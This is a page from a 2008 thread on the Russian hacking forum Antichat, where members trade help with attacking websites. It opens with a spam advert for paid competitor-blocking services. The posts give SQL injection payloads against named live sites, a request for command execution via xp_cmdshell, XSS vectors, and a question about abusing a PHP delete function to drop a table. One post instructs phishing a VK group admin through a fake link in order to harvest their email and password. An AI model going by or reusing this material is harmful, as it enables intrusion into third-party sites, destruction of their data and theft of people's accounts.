УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 418 из 2438

418

Опции темы

Поиск в этой теме

Опции просмотра

#4171

17.12.2008, 19:17

~~iddqd~~

Banned

Регистрация: 19.12.2007

Сообщений: 924

Провел на форуме:
4192567

Репутация: 2145

кажись уже давали эту ссылку:
http://www.inattack.ru/article/519.html
там насчет style 2 вектора есть, попробуй)

#4172

17.12.2008, 20:09

[Raz0r]

Members of Antichat - Level 5

Регистрация: 25.02.2007

Сообщений: 495

Провел на форуме:
3244717

Репутация: 1980

Цитата:

Сообщение от SHS

Проблема:
-1'CREATE PROC test AS SELECT 1;--sp_password

'CREATE PROCEDURE' must be the first statement in a query batch.

Че за фишка? Не въеду...

попробуй так:
1';CREATE PROC test AS SELECT 1;--sp_password

@Mixon
attr:expression() работает только в IE
background-image: url(javascript:alert()) должно везде работать
http://ha.ckers.org/xss.html

__________________
<? Raz0r.name — блог о web-безопасности

#4173

17.12.2008, 20:33

SHS

Познающий

Регистрация: 04.08.2008

Сообщений: 53

Провел на форуме:
63941

Репутация: 2

Там опечатка была )) Ну а в целом я так и сделал. И опять такую же ошибку выдает...

Еще одная интересная фишка:
Если выполнить -1+or+1=(select+user)-- то норм проходит.
А если попробовать :
-1+or+1=(SELECT+top+1+table_name+from+information_s chema.tables)--
Выдает:
Incorrect syntax near the keyword 'top'.

Если так:
-1+or+1=(SELECT+table_name+from+information_schema. tables)--
Incorrect syntax near the keyword 'FROM'.

Странно.

З. Ы. Microsoft SQL Server 2000

Последний раз редактировалось SHS; 17.12.2008 в 20:44..

#4174

17.12.2008, 22:17

Aleans

Новичок

Регистрация: 14.12.2008

Сообщений: 4

Провел на форуме:
33555

Репутация: 0

Цитата:

Сообщение от geforce

это не тот пост который тебе нужен! Вот зайди сюда http://forum.antichat.ru/thread94702.html или сюда http://forum.antichat.ru/thread45578.html

А вобще:
Узнаешь имя админа группы далее скидываешь ему ссылку http://www.vkavkaz.tu2.ru/ ну типа поддержи наш сайт и т.д. Могешь сам придумать что нить в этом плане ну или типа (дипломная работа подержи зарегся) Далее идешь сам по ссылку http://www.vkavkaz.tu2.ru/index1.php и смотришь мыло с пасом последнее вот и вс удачи!

Спасибо тебе огромное!!! А как интересно этот сайт работает?

#4175

17.12.2008, 23:31

~~F4R~~

Banned

Регистрация: 20.06.2008

Сообщений: 296

Провел на форуме:
1385078

Репутация: 126

Цитата:

http://www.u-mama.ru/forum/messages.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24

помогите немогу подобрать значение!

#4176

18.12.2008, 00:30

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Обращаюсь к код-хакам:

function del_news($news_id)
{
if ($news_id)
{
//echo("del_news ");
$r = mysql_query("SELECT news_icon FROM news WHERE news_id=".$news_id);
$arr = mysql_fetch_array($r);

if ($arr[0]){ del_img($news_id);}
//echo("del_news_id=".$news_id." ");
mysql_query("DELETE FROM news WHERE news_id=".$news_id);
}
else echo("Функция del_news(news_id) - не указан news_id. ");
}

function del_img($news_id)
{
if ($news_id)
{
//echo("del_img ");
$r = mysql_query("SELECT news_icon FROM news WHERE news_id=".$news_id);
$arr = mysql_fetch_array($r);
mysql_query("UPDATE news SET news_icon=NULL WHERE news_id=".$news_id);
unlink("../".img_path.$arr[0]);
}
else echo("Функция del_img(news_id) - не указан news_id. ");
}

Если поставить DEL запрос - он прокатит ? Если допустить,что $news_id принимает всё,что угодно. Есть в прайс листе такая кнопка Удалить

),и вместо удаления новости я хочу удалить таблицу)).Покатит ? Как это будет выглядеть,я тоже не совсем понимаю =_=

Последний раз редактировалось Велемир; 18.12.2008 в 00:32..

#4177

18.12.2008, 01:14

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Цитата:

Сообщение от F4R

помогите немогу подобрать значение!

Тут нет инъекции..

#4178

18.12.2008, 05:42

~~F4R~~

Banned

Регистрация: 20.06.2008

Сообщений: 296

Провел на форуме:
1385078

Репутация: 126

Цитата:

Сообщение от R1dex

Тут нет инъекции..

а что это по твоему?

#4179

18.12.2008, 08:20

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Просто раскрытие путей.

Советую почитать FAQ , там написанно, как инъекцию определить..

Последний раз редактировалось R1dex; 18.12.2008 в 08:28..

#4180

18.12.2008, 08:28

u36a

Познающий

Регистрация: 18.11.2008

Сообщений: 53

Провел на форуме:
170968

Репутация: 10

http://kapstroytelecom.ru/?pid=17'

Это же mssql? Скорее всего через sa настроено, помогите с инъекцией для выполнения cmd через exec master..xp_cmdshell('')...

Последний раз редактировалось u36a; 18.12.2008 в 08:39..

Страница 418 из 2438

418

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход